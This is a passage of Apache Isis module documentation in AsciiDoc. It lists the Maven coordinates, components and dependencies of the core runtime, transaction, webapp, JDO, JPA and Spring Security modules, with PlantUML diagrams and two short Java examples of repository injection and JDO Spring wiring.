+\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForCollections +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForDomainObjects +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorRegistry +\no.a.i.core.metamodel.services.events.MetamodelEventService +\no.a.i.core.metamodel.services.exceprecog.ExceptionRecognizerForRecoverableException +\no.a.i.core.metamodel.services.grid.GridLoaderServiceDefault +\no.a.i.core.metamodel.services.grid.GridReaderUsingJaxb +\no.a.i.core.metamodel.services.grid.GridServiceDefault +\no.a.i.core.metamodel.services.grid.bootstrap3.GridSystemServiceBS3 +\no.a.i.core.metamodel.services.layout.LayoutServiceDefault +\no.a.i.core.metamodel.services.metamodel.MetaModelServiceDefault +\no.a.i.core.metamodel.services.registry.ServiceRegistryDefault +\no.a.i.core.metamodel.services.tablecol.TableColumnOrderServiceDefault +\no.a.i.core.metamodel.services.title.TitleServiceDefault +\no.a.i.core.metamodel.specloader.InjectorMethodEvaluatorDefault +\no.a.i.core.metamodel.specloader.ProgrammingModelServiceDefault +\no.a.i.core.metamodel.specloader.SpecificationLoaderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForBuiltin +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForCollections +\no.a.i.core.metamodel.valuetypes.ValueTypeRegistry +\n****\n\n.Dependencies\n****\nio.swagger:swagger-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/metamodel\/services\/command\/CommandDtoFactory.adoc[CommandDtoFactory], xref:refguide:core:index\/metamodel\/services\/ixn\/InteractionDtoFactory.adoc[InteractionDtoFactory], xref:refguide:core:index\/metamodel\/services\/publishing\/CommandPublisher.adoc[CommandPublisher], xref:refguide:core:index\/metamodel\/services\/publishing\/ExecutionPublisher.adoc[ExecutionPublisher]\n****\n\n|Apache Isis Core - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtime\nType: jar\nDirectory: \/core\/runtime\n----\n|Bundles framework-internal services, utilities and events.\n\n.Components\n****\no.a.i.core.runtime.events.MetamodelEventService +\no.a.i.core.runtime.events.TransactionEventEmitter +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\n****\n\n|Apache Isis Core - Runtime Services\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtimeservices\nType: jar\nDirectory: \/core\/runtimeservices\n----\n|Introduced to keep the 'runtime' package concise.
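\n\nIt contributes the default implementations of most applib services (for example RepositoryServiceDefault or ClockServiceDefault, listed below), so application code depends only on the applib interfaces. A rough sketch, assuming standard Spring injection (the Customer class is illustrative):\n\n[source,java]\n----\nimport javax.inject.Inject;\n\nimport org.apache.isis.applib.services.repository.RepositoryService;\n\n\/\/ Illustrative domain service: it codes against the applib interface only;\n\/\/ isis-core-runtimeservices supplies RepositoryServiceDefault at runtime.\npublic class CustomerRecorder {\n\n    public static class Customer {                     \/\/ hypothetical entity\n        public final String name;\n        public Customer(final String name) { this.name = name; }\n    }\n\n    @Inject RepositoryService repositoryService;\n\n    public Customer record(final String name) {\n        final Customer customer = new Customer(name);\n        repositoryService.persist(customer);           \/\/ handled by the default implementation\n        return customer;\n    }\n}\n----\n\n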
Viewers don't have dependencies on this module.\n\n.Components\n****\no.a.i.core.runtimeservices.bookmarks.BookmarkServiceDefault +\no.a.i.core.runtimeservices.clock.ClockServiceDefault +\no.a.i.core.runtimeservices.command.CommandDtoFactoryDefault +\no.a.i.core.runtimeservices.command.CommandExecutorServiceDefault +\no.a.i.core.runtimeservices.confmenu.ConfigurationViewServiceDefault +\no.a.i.core.runtimeservices.email.EmailServiceDefault +\no.a.i.core.runtimeservices.eventbus.EventBusServiceSpring +\no.a.i.core.runtimeservices.executor.MemberExecutorServiceDefault +\no.a.i.core.runtimeservices.factory.FactoryServiceDefault +\no.a.i.core.runtimeservices.homepage.HomePageResolverServiceDefault +\no.a.i.core.runtimeservices.i18n.po.TranslationServicePo +\no.a.i.core.runtimeservices.interaction.InteractionDtoFactoryDefault +\no.a.i.core.runtimeservices.jaxb.JaxbServiceDefault +\no.a.i.core.runtimeservices.menubars.MenuBarsLoaderServiceDefault +\no.a.i.core.runtimeservices.menubars.bootstrap3.MenuBarsServiceBS3 +\no.a.i.core.runtimeservices.message.MessageServiceDefault +\no.a.i.core.runtimeservices.publish.CommandPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityChangesPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityPropertyChangePublisherDefault +\no.a.i.core.runtimeservices.publish.ExecutionPublisherDefault +\no.a.i.core.runtimeservices.queryresultscache.QueryResultsCacheDefault +\no.a.i.core.runtimeservices.recognizer.ExceptionRecognizerServiceDefault +\no.a.i.core.runtimeservices.recognizer.dae.ExceptionRecognizerForDataAccessException +\no.a.i.core.runtimeservices.repository.RepositoryServiceDefault +\no.a.i.core.runtimeservices.routing.RoutingServiceDefault +\no.a.i.core.runtimeservices.scratchpad.ScratchpadDefault +\no.a.i.core.runtimeservices.session.InteractionFactoryDefault +\no.a.i.core.runtimeservices.sudo.SudoServiceDefault +\no.a.i.core.runtimeservices.transaction.TransactionServiceSpring +\no.a.i.core.runtimeservices.urlencoding.UrlEncodingServiceWithCompression +\no.a.i.core.runtimeservices.user.UserServiceDefault +\no.a.i.core.runtimeservices.userprof.UserProfileServiceDefault +\no.a.i.core.runtimeservices.userreg.EmailNotificationServiceDefault +\no.a.i.core.runtimeservices.wrapper.WrapperFactoryDefault +\no.a.i.core.runtimeservices.xml.XmlServiceDefault +\no.a.i.core.runtimeservices.xmlsnapshot.XmlSnapshotServiceDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/runtimeservices\/transaction\/TransactionServiceSpring.adoc[TransactionServiceSpring], xref:refguide:core:index\/runtimeservices\/xml\/XmlServiceDefault.adoc[XmlServiceDefault]\n****\n\n|Apache Isis Core - Security\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-security\nType: jar\nDirectory: \/core\/security\n----\n|.Components\n****\no.a.i.core.security.authentication.manager.AuthenticationManager +\no.a.i.core.security.authentication.standard.RandomCodeGeneratorDefault +\no.a.i.core.security.authorization.manager.AuthorizationManager +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> 
+\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/security\/authentication\/Authentication.adoc[Authentication], xref:refguide:core:index\/security\/authentication\/AuthenticationRequest.adoc[AuthenticationRequest], xref:refguide:core:index\/security\/authentication\/Authenticator.adoc[Authenticator], xref:refguide:core:index\/security\/authorization\/Authorizor.adoc[Authorizor]\n****\n\n|Apache Isis Core - Transaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-transaction\nType: jar\nDirectory: \/core\/transaction\n----\n|Provides transaction integration with Spring and also\nentity change tracking, with associated publishing and pre\/post value events.\n\n.Components\n****\no.a.i.core.transaction.changetracking.EntityChangeTrackerDefault +\no.a.i.core.transaction.changetracking.events.TimestampService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/transaction\/changetracking\/EntityChangeTracker.adoc[EntityChangeTracker], xref:refguide:core:index\/transaction\/changetracking\/EntityChangeTrackerDefault.adoc[EntityChangeTrackerDefault], xref:refguide:core:index\/transaction\/changetracking\/EntityChangesPublisher.adoc[EntityChangesPublisher], xref:refguide:core:index\/transaction\/changetracking\/EntityPropertyChangePublisher.adoc[EntityPropertyChangePublisher], xref:refguide:core:index\/transaction\/events\/TransactionAfterCompletionEvent.adoc[TransactionAfterCompletionEvent]\n****\n\n|Apache Isis Core - WebApp\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-webapp\nType: jar\nDirectory: \/core\/webapp\n----\n|Bundles all the web-specific classes as required by viewers.\nIntroduced to keep the 'runtime' package concise.\n\n.Components\n****\no.a.i.core.webapp.health.HealthIndicatorUsingHealthCheckService +\no.a.i.core.webapp.modules.logonlog.WebModuleLogOnExceptionLogger +\no.a.i.core.webapp.modules.templresources.WebModuleTemplateResources +\no.a.i.core.webapp.webappctx.IsisWebAppContextInitializer +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\norg.springframework.boot:spring-boot:jar:<managed> +\norg.springframework.boot:spring-boot-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-thymeleaf:jar:<managed> +\n****\n\n|Apache Isis - JDK Supplemental\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-jdk-supplemental\nType: pom\nDirectory: \/core\/jdk-supplemental\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed in later JDK versions.\n\nWill be removed once the framework migrates to Java 11 as the required\nminimum version.\n\n.Dependencies\n****\ncom.fasterxml.woodstox:woodstox-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-impl:jar:<managed> +\ncom.sun.xml.ws:jaxws-ri:pom:<managed> +\ncom.sun.xml.ws:jaxws-rt:jar:${jaxws-ri.version} +\njavax.xml.bind:jaxb-api:jar:<managed> +\norg.codehaus.woodstox:stax2-api:jar:<managed> 
+\norg.eclipse.persistence:org.eclipse.persistence.moxy:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.sdo:jar:<managed> +\n****\n\n|Apache Isis Core - Schemas\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-schema\nType: jar\nDirectory: \/api\/schema\n----\n|Apache Isis schemas, for conversion into canonical DTOs (for use in integration scenarios).\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:schema:index\/IsisModuleSchema.adoc[IsisModuleSchema]\n****\n|===\n\n== Persistence\n\n=== JDO\n\n[plantuml,JDO,svg]\n----\n@startuml(id=JDO)\ntitle JDO - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JDO\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JDO (Spring)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Persistence - JDO (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JDO (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JDO (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JDO (provider)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Persistence - JDO Provider (DataNucleus)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JDO)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo\nType: pom\nDirectory: \/persistence\/jdo\n----\n|Supplementary applib for JDO persistence\n\n|Apache Isis Persistence - JDO (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-applib\nType: jar\nDirectory: \/persistence\/jdo\/applib\n----\n|Supplementary applib for JDO persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index 
Entries\n****\nxref:refguide:persistence:index\/jdo\/applib\/IsisModulePersistenceJdoApplib.adoc[IsisModulePersistenceJdoApplib], xref:refguide:persistence:index\/jdo\/applib\/services\/JdoSupportService.adoc[JdoSupportService]\n****\n\n|Apache Isis Persistence - JDO Provider (DataNucleus)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-datanucleus\nType: jar\nDirectory: \/persistence\/jdo\/datanucleus\n----\n|JDO Implementation (powered by DataNucleus)\n\n.Components\n****\no.a.i.persistence.jdo.datanucleus.config.DnEntityDiscoveryListener +\no.a.i.persistence.jdo.datanucleus.entities.DnEntityStateProvider +\no.a.i.persistence.jdo.datanucleus.jdosupport.JdoSupportServiceDefault +\no.a.i.persistence.jdo.datanucleus.metamodel.JdoDataNucleusProgrammingModel +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-integration:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.datanucleus:datanucleus-api-jdo:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\norg.datanucleus:datanucleus-jdo-query:jar:<managed> +\norg.datanucleus:datanucleus-jodatime:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.springframework.boot:spring-boot-starter-jdbc:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jdo\/datanucleus\/IsisModuleJdoDatanucleus.adoc[IsisModuleJdoDatanucleus], xref:refguide:persistence:index\/jdo\/datanucleus\/changetracking\/JdoLifecycleListener.adoc[JdoLifecycleListener], xref:refguide:persistence:index\/jdo\/datanucleus\/dialect\/DnJdoDialect.adoc[DnJdoDialect], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusIdLong.adoc[Persistable_datanucleusIdLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionLong.adoc[Persistable_datanucleusVersionLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionTimestamp.adoc[Persistable_datanucleusVersionTimestamp], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_downloadJdoMetadata.adoc[Persistable_downloadJdoMetadata], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisBookmarkConverter.adoc[IsisBookmarkConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisLocalResourcePathConverter.adoc[IsisLocalResourcePathConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisMarkupConverter.adoc[IsisMarkupConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisPasswordConverter.adoc[IsisPasswordConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/image\/JavaAwtBufferedImageByteArrayConverter.adoc[JavaAwtBufferedImageByteArrayConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisChangesDtoConverter.adoc[IsisChangesDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisCommandDtoConverter.adoc[IsisCommandDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisInteractionDtoConverter.adoc[IsisInteractionDtoConverter], 
xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisOidDtoConverter.adoc[IsisOidDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoOffsetTimeConverter.adoc[IsoOffsetTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoZonedDateTimeConverter.adoc[IsoZonedDateTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/valuemappings\/applib\/ByteArrayBlobRdbmsMapping.adoc[ByteArrayBlobRdbmsMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisBlobMapping.adoc[IsisBlobMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisClobMapping.adoc[IsisClobMapping]\n****\n\n|Apache Isis Persistence - JDO (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-integration\nType: jar\nDirectory: \/persistence\/jdo\/integration\n----\n|JDO Integration (powered by DataNucleus)\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-spring:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-metamodel\nType: jar\nDirectory: \/persistence\/jdo\/metamodel\n----\n|JDO Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jdo.metamodel.JdoProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (provider)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-provider\nType: jar\nDirectory: \/persistence\/jdo\/provider\n----\n|JDO Provider to be implemented by any actual JDO provider, e.g. DataNucleus.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (Spring)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-spring\nType: jar\nDirectory: \/persistence\/jdo\/spring\n----\n|JDO Spring integration.\n\nThis is a fork of the Spring ORM JDO sources on GitHub,\nfor which support had been dropped back in 2016 [1].\n\nCredits to the original authors.
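\n\nThe kind of wiring this module restores is sketched below, written against the original Spring ORM JDO API for illustration (see [2]); class and property names are indicative only, as the fork repackages equivalents of these:\n\n[source,java]\n----\nimport javax.jdo.PersistenceManagerFactory;\n\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.core.io.ClassPathResource;\nimport org.springframework.orm.jdo.JdoTransactionManager;\nimport org.springframework.orm.jdo.LocalPersistenceManagerFactoryBean;\n\n\/\/ Sketch only: uses the original (pre-fork) Spring ORM JDO class names from [2].\n@Configuration\npublic class JdoSpringConfig {\n\n    @Bean\n    public LocalPersistenceManagerFactoryBean pmf() {\n        final LocalPersistenceManagerFactoryBean pmf = new LocalPersistenceManagerFactoryBean();\n        pmf.setConfigLocation(new ClassPathResource(\"datanucleus.properties\")); \/\/ JDO provider config\n        return pmf;\n    }\n\n    @Bean\n    public JdoTransactionManager txManager(final PersistenceManagerFactory pmf) {\n        return new JdoTransactionManager(pmf); \/\/ lets @Transactional drive JDO transactions\n    }\n}\n----\n\n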
See also docs [2].\n\n[1] https:\/\/github.com\/spring-projects\/spring-framework\/issues\/18702\n[2] https:\/\/docs.spring.io\/spring-framework\/docs\/3.0.0.RC2\/reference\/html\/ch13s04.html\n\n.Dependencies\n****\njavax.servlet:javax.servlet-api:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n|===\n\n=== JPA\n\n[plantuml,JPA,svg]\n----\n@startuml(id=JPA)\ntitle JPA - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JPA\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JPA (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JPA (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JPA (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JPA EclipseLink\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JPA)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa\nType: pom\nDirectory: \/persistence\/jpa\n----\n|Apache Isis JPA integration\n\n|Apache Isis Persistence - JPA (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-applib\nType: jar\nDirectory: \/persistence\/jpa\/applib\n----\n|Supplementary applib for JPA persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/applib\/integration\/JpaEntityInjectionPointResolver.adoc[JpaEntityInjectionPointResolver], xref:refguide:persistence:index\/jpa\/applib\/services\/JpaSupportService.adoc[JpaSupportService]\n****\n\n|Apache Isis Persistence - JPA EclipseLink\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-eclipselink\nType: jar\nDirectory: \/persistence\/jpa\/eclipselink\n----\n|EclipseLink integration. 
Sets up EclipseLink as the implementation provider for Spring Data JPA.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-integration:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.jpa:jar:2.7.8 +\norg.springframework.boot:spring-boot-starter-data-jpa:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/eclipselink\/IsisModuleJpaEclipselink.adoc[IsisModuleJpaEclipselink]\n****\n\n|Apache Isis Persistence - JPA (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-integration\nType: jar\nDirectory: \/persistence\/jpa\/integration\n----\n|JPA integration (facets, jpa-context)\n\n.Components\n****\no.a.i.persistence.jpa.integration.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-metamodel:jar:<managed> +\norg.springframework.data:spring-data-jpa:jar:<managed> +\n****\n\n|Apache Isis Persistence - JPA (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-metamodel\nType: jar\nDirectory: \/persistence\/jpa\/metamodel\n----\n|JPA Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jpa.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\n****\n|===\n\n== Security\n\n[plantuml,Security,svg]\n----\n@startuml(id=Security)\ntitle Security - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Security\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Spring\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Security)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Spring\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-spring\nType: jar\nDirectory: \/security\/spring\n----\n|Authentication using Spring Security\n\n.Components\n****\no.a.i.security.spring.authentication.AuthenticatorSpring +\no.a.i.security.spring.webmodule.WebModuleSpringSecurity +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework.boot:spring-boot-starter-security:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/spring\/IsisModuleSecuritySpring.adoc[IsisModuleSecuritySpring], xref:refguide:security:index\/spring\/authentication\/AuthenticatorSpring.adoc[AuthenticatorSpring], xref:refguide:security:index\/spring\/webmodule\/SpringSecurityFilter.adoc[SpringSecurityFilter], xref:refguide:security:index\/spring\/webmodule\/WebModuleSpringSecurity.adoc[WebModuleSpringSecurity]\n****\n|===\n\n=== 
